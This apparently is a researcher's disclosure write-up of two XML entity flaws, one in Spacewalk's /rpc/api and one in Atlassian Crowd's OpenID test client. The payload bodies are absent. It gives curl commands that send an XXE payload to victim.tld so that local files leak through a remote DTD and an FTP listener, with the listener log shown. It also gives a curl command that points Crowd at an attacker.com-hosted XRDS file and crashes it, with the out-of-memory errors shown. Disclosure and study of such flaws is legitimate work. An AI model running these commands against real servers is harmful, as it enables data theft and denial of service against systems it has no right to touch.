A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.
Local file read
XML-RPC call for final exploit
curl -X POST -sik https://victim.tld/rpc/api -H ‘Content-Type: application/xml’ –data @xxe-ftp-exfil.xml
After execution and running an FTP listener, you will see the remote DTD fetch, along with the following exfiltration of the local file.
"GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151"
2020/02/17 00:00:00 [*] Connection Accepted from [x.x.x.x:00000]
PASS: [email protected]
2020/02/17 00:00:00 [*] Closing FTP Connection
Atlassian Crowd is a single sign-on and user identity solution software for the web. Crowd comes with a built in OpenID client for testing OpenID integrations, by supplying the test client with a URL hosted with a malicious payload, an attacker can remotely DoS the Crowd instance by XML Entity Expansion that consumes all memory and subsequently crashes the application.
After studying the OpenID protocol and understanding what kind of XML is expected, I was able to craft the following response.
Proof of Concept XML XRDS payload:
Once hosted somewhere, invoking the following will execute the payload on the crowd instance:
curl -sik 'https://crowd.victim.tld/openidclient/login!login.action' --data 'openid_identifier=https%3A%2F%2Fattacker.com%2Fxrds.php'
Now, the server will expand entities until memory is consumed and produce output such as:
Exception in thread "AsyncFileHandlerWriter-1300109446" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-7" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-8" Exception in thread "http-nio-8095-exec-6" java.lang.OutOfMemoryError: Java heap space
java.lang.OutOfMemoryError: Java heap space
Exception in thread "http-nio-8095-exec-4" java.lang.OutOfMemoryError: GC overhead limit exceeded
Atlassian has responded to the issue via Bug Bounty program on Bugcrowd.com/atlassian and has issued fixes.
Software has been fixed as of:
CVE and CWD references:
Happy Hunting 😊